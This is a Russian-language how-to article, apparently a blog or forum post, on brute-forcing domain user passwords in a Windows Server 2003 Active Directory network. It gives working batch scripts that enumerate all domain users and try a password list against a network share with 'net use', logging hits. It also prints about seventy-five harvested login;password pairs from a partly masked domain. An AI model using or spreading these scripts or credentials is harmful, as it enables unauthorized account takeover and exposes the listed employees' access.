Это моя первая статья , прошу не ругать.

В этой статье приведу пример брутфорса паролей обычных пользователей в домене, построенном на Active Directory (Windows Server 2003). Весь материал практический и проверен на приведённом примере.

1.Получаем в консоли список пользователей AD :
cmd> net user /domain >> username.txt

2.Получился файл username.txt вида :
__vmware_user__ aaii ababkovaeg
abaevalu abashevaia abdrahimovalm
abdrahimovaod abdrakhmanovadr abdrakhmanovaik
abdrakhmanovds abdulinalr abdulinma
abdulkarimovavk abdullinaa abdullinagr
abdullinalr abdullinayur abdullinma
abdulmanovpsh abdulovasv abdulovavb

3.Сделаем для простоты файл user.txt c именами пользователей в 1 столбик:
1)создадим Bat-файл parser.bat :
@for /f "tokens=1,2,3*" %%i in (username.txt) do (@echo %%i >>user.txt)&(@echo %%j >>user.txt)&(@echo %%k >> user.txt)
2) запускаем и ждём окончания.

4.Создаем файл паролей pass.txt с паролями в 1 столбик по одному,например :
11111111
12345678

5.Создаём Bat-файл brut.bat :
for /f %%i in (user.txt) do for /f %%j in (pass.txt) do (net use r: \\w300\foto %%j /user:****.ru\%%i /persistent:yes)&&(echo %%i;%%j>>success.txt)&&(net use r: /delete)

P.S: r: -временный несуществующий диск
\\w300\foto - любая существующая сетевая папка
****.ru - домен с AD

6. Запускаем brut.bat и ждём

7. По окончанию получен файл success.txt вида логин;пароль :

ahatovms;12345678
alehinasyu;11111111
batueveev;11111111
bikbulatovala;11111111
bochkovae;12345678
bogdanovama;12345678
bondarenkolp;11111111
boss;12345678
chudinoven;11111111
dyadkovatv;11111111
efremovas;12345678
gafurivann;11111111
gunbinana;12345678
ifepo;11111111
ifepoe;11111111
izjurovaa;12345678
jkmuf;11111111
kashiginaas;11111111
konovalovana;11111111
konyaevaea;12345678
korgakovasv;12345678
kostarevaam;11111111
kosyyie;12345678
kozevnikovald;11111111
kuksovalv;11111111
kursi;11111111
labeikinas;12345678
litkesg;11111111
lupanovaiv;11111111
lyashenkoyuv;11111111
martynovakju;12345678
maryaninovna;11111111
matrosds;11111111
mosienkomu;12345678
moskalenkooa;12345678
mudrakln;11111111
nikonovadr;12345678
ntuser;11111111
ognevayamm;11111111
olimpinf;11111111
omarovaka;12345678
paryshevaae;12345678
pesinla;11111111
pivchenkoea;12345678
plotnikovaev2;aaaaaaaa
poletaevsn;12345678
popovsm;12345678
portnovab;11111111
pozdnyakovaep;12345678
pozhnikovaas;12345678
pu-85;11111111
pyatnitskiyas;11111111
ReslerLA;12345678
safronovas;11111111
shankovskihea;11111111
shaysultanovaoa;11111111
shefersv;11111111
shhukinaia;12345678
shkiravp;12345678
shvarevaia;11111111
sibagatulinnaai;12345678
stafeevams;11111111
tatarinovam;11111111
team3;11111111
tolkachevaev;11111111
trenkleee;11111111
troyanoviv;12345678
turovecgv;12345678
u1;11111111
u2;11111111
u4;11111111
u5;11111111
uit_pochta;11111111
volozeninanb;11111111
yashinama;12345678
zaharovavm;11111111

8.Чтобы просмотреть права пользователя вводим :
cmd> net user имя_пользователя@****.ru // или ваш домен



Спасибо за внимание!